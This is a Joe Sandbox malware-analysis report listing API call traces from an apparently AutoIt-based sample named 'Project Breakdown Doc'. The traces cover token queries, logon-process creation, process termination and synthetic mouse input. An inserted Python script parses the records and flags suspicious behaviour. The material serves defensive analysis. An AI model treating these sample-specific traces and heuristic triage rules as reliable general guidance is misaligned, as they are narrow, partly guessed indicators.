                                                  • Instruction Fuzzy Hash: 52415130600241AFDB26CF94C48AF997BF1BB05310F1841BDFA589F2A2C732AD46DB51
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00CB5134,?,?,00000000,00000001), ref: 00CB73BF
                                                    • Part of subcall function 00CB3C94: GetWindowRect.USER32(?,?), ref: 00CB3CA7
                                                  • GetDesktopWindow.USER32 ref: 00CB73E9
                                                  • GetWindowRect.USER32(00000000), ref: 00CB73F0
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CB7422
                                                    • Part of subcall function 00CA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  • GetCursorPos.USER32(?), ref: 00CB744E
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CB74AC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: 633a5954d8a905a69c4f4e8721d9ffa5973eb572d8c19f87ca50040a14b99211
                                                  • Instruction ID: 74df4b7446459ee3aa9557aa59306d59b64bb55ee33cacd7ec997eaf7f91bae8
                                                  • Opcode Fuzzy Hash: 633a5954d8a905a69c4f4e8721d9ffa5973eb572d8c19f87ca50040a14b99211
                                                  • Instruction Fuzzy Hash: B331B672509306ABD720DF54D849F9FBBAAFF88314F004A29F99597191C670EA09CF92
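The "APIs" records above all share one line shape: an optional "Part of subcall function" prefix, the API name and module, the argument slots the sandbox recovered ("?" where it could not), and the call-site address after "ref:". The following is an added example for this page, not Joe Sandbox code: it parses that shape into structured calls and runs a few triage rules of its own over the combase.dll delay-load record, the GetTokenInformation record and the mouse_event record (call lines copied from this report). The parameter count for LoadLibraryExW, the Windows constants and the rules themselves are the example's assumptions, not the sandbox's signature logic; in particular, reading the stack slot past LoadLibraryExW's three parameters as the pending GetProcAddress name is a heuristic for this call idiom, not a documented field of the report.

```python
"""Parse Joe Sandbox 'APIs' call records and run a few triage rules over them.

Added example for the report page, not Joe Sandbox code.  Line shape taken from
the page's records; constants and rules are this example's own assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One call line: optional "Part of subcall function X:" prefix, Api.MODULE,
# optional "(args)", then "ref: <address>".  Both of these shapes match:
#   • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C64292,?), ref: 00C641E3
#   • _memmove.LIBCMT ref: 00C47F82
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_SLOT_RE = re.compile(r"^-?[0-9A-Fa-f]{8}$")

LOADLIBRARYEXW_PARAMS = 3               # real parameters; later slots are stack contents (assumed)
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x00000800   # SDK constants, from the headers, not the report
TOKEN_GROUPS = 2                        # TOKEN_INFORMATION_CLASS.TokenGroups
MOUSEEVENTF_MOVE, MOUSEEVENTF_ABSOLUTE = 0x0001, 0x8000


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[object]          # int for 8-hex-digit slots, None for '?', str otherwise
    ref: int                    # call-site address
    parent: Optional[int]       # set when the line is "Part of subcall function X"


def parse_args(raw: str) -> List[object]:
    if not raw.strip():
        return []
    out: List[object] = []
    for tok in (t.strip() for t in raw.split(",")):
        if tok == "?":
            out.append(None)                # value not recovered by the sandbox
        elif HEX_SLOT_RE.match(tok):
            out.append(int(tok, 16))        # also covers the "-00000001" spelling
        else:
            out.append(tok)                 # string argument, e.g. combase.dll
    return out


def parse_record(text: str) -> List[ApiCall]:
    """Parse every call line of one record; headings and other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = parse_args(m["args"]) if m["args"] is not None else []
        parent = int(m["parent"], 16) if m["parent"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), parent))
    return calls


def triage(calls: List[ApiCall]) -> List[str]:
    """Apply the example's own rules to one record; repeated findings are collapsed."""
    findings: List[str] = []
    names = [c.api for c in calls]

    def add(note: str) -> None:
        if note not in findings:
            findings.append(note)

    for i, c in enumerate(calls):
        if c.api in ("LoadLibraryExW", "LoadLibraryW") and "GetProcAddress" in names[i + 1:]:
            note = f"dynamic API resolution: {c.args[0] if c.args else '?'} via LoadLibrary/GetProcAddress"
            if c.api == "LoadLibraryExW":
                if len(c.args) > 2 and isinstance(c.args[2], int) and c.args[2] & LOAD_LIBRARY_SEARCH_SYSTEM32:
                    note += " [LOAD_LIBRARY_SEARCH_SYSTEM32]"
                n = LOADLIBRARYEXW_PARAMS   # heuristic: slot past the parameters holds the pending proc name
                if len(c.args) > n and isinstance(c.args[n], str):
                    note += f", probable import: {c.args[n]}"
            add(note)
        elif c.api == "GetTokenInformation" and len(c.args) > 1 and c.args[1] == TOKEN_GROUPS:
            add("token group enumeration (TokenGroups): typical of an admin/elevation check")
        elif c.api == "mouse_event" and c.args and isinstance(c.args[0], int):
            if c.args[0] & MOUSEEVENTF_MOVE and c.args[0] & MOUSEEVENTF_ABSOLUTE:
                add("synthetic mouse input: absolute cursor move (MOUSEEVENTF_ABSOLUTE|MOVE)")
        elif c.api == "RegConnectRegistryW":
            add("remote registry connection (RegConnectRegistryW)")
    return findings


SAMPLE_RECORDS = {   # call lines copied from this report's function records
    "combase_delay_load": """APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C64292,?), ref: 00C641E3
• GetProcAddress.KERNEL32(00000000), ref: 00C641EA
• EncodePointer.KERNEL32(00000000), ref: 00C641F6
• DecodePointer.KERNEL32(00000001,00C64292,?), ref: 00C64213
""",
    "token_groups": """APIs
  • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C98608
  • Part of subcall function 00C985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C98612
  • Part of subcall function 00C985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C98621
  • Part of subcall function 00C985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C98628
  • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9863E
• GetLengthSid.ADVAPI32(?,00000000,00C98977), ref: 00C98DAC
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C98DB8
• HeapAlloc.KERNEL32(00000000), ref: 00C98DBF
• CopySid.ADVAPI32(00000000,00000000,?), ref: 00C98DD8
• GetProcessHeap.KERNEL32(00000000,00000000,00C98977), ref: 00C98DEC
• HeapFree.KERNEL32(00000000), ref: 00C98DF3
""",
    "mouse": """• GetForegroundWindow.USER32(?,?,?,?,?,?,00CB5134,?,?,00000000,00000001), ref: 00CB73BF
  • Part of subcall function 00CB3C94: GetWindowRect.USER32(?,?), ref: 00CB3CA7
• GetDesktopWindow.USER32 ref: 00CB73E9
• GetWindowRect.USER32(00000000), ref: 00CB73F0
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00CB7422
  • Part of subcall function 00CA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
• GetCursorPos.USER32(?), ref: 00CB744E
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00CB74AC
""",
}

if __name__ == "__main__":
    for name, text in SAMPLE_RECORDS.items():
        calls = parse_record(text)
        print(f"{name}: {len(calls)} calls")
        for finding in triage(calls):
            print("  -", finding)
```

Run as a script it prints one finding per record; to use it on a different listing, paste a record's "APIs" lines into parse_record and extend triage with rules for the APIs you care about. Calls with a parent address are the sandbox's "Part of subcall function" lines, so a rule can tell a call made by the function itself from one made by a callee.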
                                                  APIs
                                                    • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C98608
                                                    • Part of subcall function 00C985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C98612
                                                    • Part of subcall function 00C985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C98621
                                                    • Part of subcall function 00C985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C98628
                                                    • Part of subcall function 00C985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C9863E
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C98977), ref: 00C98DAC
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C98DB8
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C98DBF
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C98DD8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C98977), ref: 00C98DEC
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98DF3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: ca812f1878f6a216c0bbb4644e87c0aa4ea805b7783e5aeccf98c7843d7c4489
                                                  • Instruction ID: 3bbce7418fc8ce04ab5db8324bb34a86f0466ab64e5c31aa36ddb24ad3c0a52b
                                                  • Opcode Fuzzy Hash: ca812f1878f6a216c0bbb4644e87c0aa4ea805b7783e5aeccf98c7843d7c4489
                                                  • Instruction Fuzzy Hash: DB11BE32501606FFDF109FA4CC0DFAE7BAAEF56315F14402EE85997251CB329A09DB60
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C98B2A
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C98B31
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C98B40
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C98B4B
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C98B7A
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C98B8E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 30876dbff149a96e3f2b2b9fe0b3465e4d9cfa07696870b1060cdc1a7ce38224
                                                  • Instruction ID: 2e9080a58818091b4c26c83afe53c2772527e6db9581c4be132392db0d4393cf
                                                  • Opcode Fuzzy Hash: 30876dbff149a96e3f2b2b9fe0b3465e4d9cfa07696870b1060cdc1a7ce38224
                                                  • Instruction Fuzzy Hash: 52112CB2501249ABDF018FA4DD49FDE7BA9FF49704F084069FE04A2160C7769E659B60
                                                  APIs
                                                    • Part of subcall function 00C412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C4134D
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4135C
                                                    • Part of subcall function 00C412F3: BeginPath.GDI32(?), ref: 00C41373
                                                    • Part of subcall function 00C412F3: SelectObject.GDI32(?,00000000), ref: 00C4139C
                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CCC1C4
                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00CCC1D8
                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CCC1E6
                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00CCC1F6
                                                  • EndPath.GDI32(00000000), ref: 00CCC206
                                                  • StrokePath.GDI32(00000000), ref: 00CCC216
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                  • String ID:
                                                  • API String ID: 43455801-0
                                                  • Opcode ID: c3b876486d19ac62571c17346d57c70a85db26f826b3ea804d19b542ae837cfa
                                                  • Instruction ID: 7f6f698aa8ef886faff82afb084e5169b3df850b65b576b0db72b2f918971215
                                                  • Opcode Fuzzy Hash: c3b876486d19ac62571c17346d57c70a85db26f826b3ea804d19b542ae837cfa
                                                  • Instruction Fuzzy Hash: CD11097640010CBFEB119F90DC88FAA7FADFB08354F048029FA189A1A1C7719E56DBA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C603D3
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C603DB
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C603E6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C603F1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C603F9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C60401
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: 59caf0366977b14bbffd4198f021afb7f106f803d626bf4f5486581058d69568
                                                  • Instruction ID: 4542cd8a1659b1e9c07da7bcb510ebeb1ea4a45f9a32dedef1006a21bb3a601c
                                                  • Opcode Fuzzy Hash: 59caf0366977b14bbffd4198f021afb7f106f803d626bf4f5486581058d69568
                                                  • Instruction Fuzzy Hash: BE0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CA569B
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CA56B1
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00CA56C0
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56CF
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56D9
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CA56E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: dee63f4b8eae6e447cac43d6d8274542e375095892de3cd1b1286dff5f07a974
                                                  • Instruction ID: 57693c993cc9812f76675fc847c20d8d03735156acc0d9d6b229a8ecff7ca5f1
                                                  • Opcode Fuzzy Hash: dee63f4b8eae6e447cac43d6d8274542e375095892de3cd1b1286dff5f07a974
                                                  • Instruction Fuzzy Hash: C4F03032641559BBE7215BA2DC0DFEF7B7DEFC6B11F04016DFA04D1060D7A15A0286B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00CA74E5
                                                  • EnterCriticalSection.KERNEL32(?,?,00C51044,?,?), ref: 00CA74F6
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00C51044,?,?), ref: 00CA7503
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C51044,?,?), ref: 00CA7510
                                                    • Part of subcall function 00CA6ED7: CloseHandle.KERNEL32(00000000,?,00CA751D,?,00C51044,?,?), ref: 00CA6EE1
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA7523
                                                  • LeaveCriticalSection.KERNEL32(?,?,00C51044,?,?), ref: 00CA752A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: 4bd685cb1dfab8d38d0bd34f74ffe7b660515e0d4e28ca6b05b427b3c5001e83
                                                  • Instruction ID: 9bdedc970e74f05bf218815659c8c14189108facb139e9b11cd99df7a1035ada
                                                  • Opcode Fuzzy Hash: 4bd685cb1dfab8d38d0bd34f74ffe7b660515e0d4e28ca6b05b427b3c5001e83
                                                  • Instruction Fuzzy Hash: 41F03A3A540612EBDB121B64EC88FEE772AFF45302B04063AF202914A1CB755902CA50
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C98E7F
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C98E8B
                                                  • CloseHandle.KERNEL32(?), ref: 00C98E94
                                                  • CloseHandle.KERNEL32(?), ref: 00C98E9C
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C98EA5
                                                  • HeapFree.KERNEL32(00000000), ref: 00C98EAC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 1f40b04056b1e9315e558e2d3509d71a7e656aacb68156298d9e4b1f381c4723
                                                  • Instruction ID: 24df45cc620abce825933240eef7a5f0a739e8df64e441590168f1919b3f9719
                                                  • Opcode Fuzzy Hash: 1f40b04056b1e9315e558e2d3509d71a7e656aacb68156298d9e4b1f381c4723
                                                  • Instruction Fuzzy Hash: D3E05276104505FBDA021FE6EC0CF5EBB6AFB89762B58863AF21981470CB329462DB50
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00CB8928
                                                  • CharUpperBuffW.USER32(?,?), ref: 00CB8A37
                                                  • VariantClear.OLEAUT32(?), ref: 00CB8BAF
                                                    • Part of subcall function 00CA7804: VariantInit.OLEAUT32(00000000), ref: 00CA7844
                                                    • Part of subcall function 00CA7804: VariantCopy.OLEAUT32(00000000,?), ref: 00CA784D
                                                    • Part of subcall function 00CA7804: VariantClear.OLEAUT32(00000000), ref: 00CA7859
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: c5bbdf9231589853a0b870ddf8c1808da531a5a0ef5d94e98fd64972f15ce0bf
                                                  • Instruction ID: 59530752426720722cbef378d42b10b84de40d403a09ecb48b7717abe8eff7b8
                                                  • Opcode Fuzzy Hash: c5bbdf9231589853a0b870ddf8c1808da531a5a0ef5d94e98fd64972f15ce0bf
                                                  • Instruction Fuzzy Hash: C5918F756083019FCB10DF24C4859ABBBE8FF89354F14496EF89A8B361DB31E909DB52
                                                  APIs
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • _memset.LIBCMT ref: 00CA3077
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA30A6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CA3159
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CA3187
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: bae1f64d63533b51647658db3c9c389e71eaea7ba5e49158effa06dda3fced8a
                                                  • Instruction ID: 3635a602d868d2b0dbdf00ad8b05e244c7bf670656b1c83047b6d2b42f1fd8f0
                                                  • Opcode Fuzzy Hash: bae1f64d63533b51647658db3c9c389e71eaea7ba5e49158effa06dda3fced8a
                                                  • Instruction Fuzzy Hash: 6451DF316083829FD7259F68C855A6FB7E4EF46318F040A2DFAA5D21E1DB70CF449792
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C9DAC5
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C9DAFB
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C9DB0C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C9DB8E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 6874e026da17b1d9297a0d41695f62ad18eafde62a749f8278b9332f45ebc706
                                                  • Instruction ID: 67b3adbec5890a7d35874ac196945c3d450b310e9a1f8b3d87c4ca8a6466d886
                                                  • Opcode Fuzzy Hash: 6874e026da17b1d9297a0d41695f62ad18eafde62a749f8278b9332f45ebc706
                                                  • Instruction Fuzzy Hash: D9415FB1600208EFDF15CF55C888B9A7BA9EF44350F1580AEED06AF205D7B1DE84DBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CA2CAF
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CA2CCB
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00CA2D11
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D06890,00000000), ref: 00CA2D5A
                                                  Strings
